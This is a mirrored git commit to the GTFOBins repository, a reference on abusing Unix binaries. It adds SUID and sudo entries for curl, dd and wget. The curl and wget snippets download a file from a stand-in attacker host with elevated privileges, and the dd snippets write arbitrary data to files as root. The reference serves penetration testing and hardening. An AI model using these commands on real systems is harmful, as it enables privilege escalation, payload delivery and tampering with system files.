mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Add suid-enabled and sudo-enabled to curl, dd, and wget
This commit is contained in:
parent
00a06edb07
commit
b016b7b9dd
@ -17,4 +17,16 @@ functions:
|
|||||||
code: |
|
code: |
|
||||||
LFILE=/tmp/file_to_read
|
LFILE=/tmp/file_to_read
|
||||||
curl file://$LFILE
|
curl file://$LFILE
|
||||||
|
suid-enabled:
|
||||||
|
- description: Fetch a remote file via HTTP GET request.
|
||||||
|
code: |
|
||||||
|
URL=http://attacker.com/file_to_get
|
||||||
|
LFILE=file_to_save
|
||||||
|
./curl $URL -o $LFILE
|
||||||
|
sudo-enabled:
|
||||||
|
- description: Fetch a remote file via HTTP GET request.
|
||||||
|
code: |
|
||||||
|
URL=http://attacker.com/file_to_get
|
||||||
|
LFILE=file_to_save
|
||||||
|
sudo -E curl $URL -o $LFILE
|
||||||
---
|
---
|
||||||
|
@ -8,4 +8,12 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
dd if=LFILE
|
dd if=LFILE
|
||||||
|
suid-enabled:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_write
|
||||||
|
echo "data" | ./dd of=$LFILE
|
||||||
|
sudo-enabled:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_write
|
||||||
|
echo "data" | sudo -E dd of=$LFILE
|
||||||
---
|
---
|
||||||
|
@ -12,4 +12,16 @@ functions:
|
|||||||
export URL=http://attacker.com/file_to_get
|
export URL=http://attacker.com/file_to_get
|
||||||
export LFILE=file_to_save
|
export LFILE=file_to_save
|
||||||
wget $URL -O $LFILE
|
wget $URL -O $LFILE
|
||||||
|
suid-enabled:
|
||||||
|
- description: Fetch a remote file via HTTP GET request.
|
||||||
|
code: |
|
||||||
|
export URL=http://attacker.com/file_to_get
|
||||||
|
export LFILE=file_to_save
|
||||||
|
./wget $URL -O $LFILE
|
||||||
|
sudo-enabled:
|
||||||
|
- description: Fetch a remote file via HTTP GET request.
|
||||||
|
code: |
|
||||||
|
export URL=http://attacker.com/file_to_get
|
||||||
|
export LFILE=file_to_save
|
||||||
|
sudo -E wget $URL -O $LFILE
|
||||||
---
|
---
|
||||||
|
Loading…
Reference in New Issue
Block a user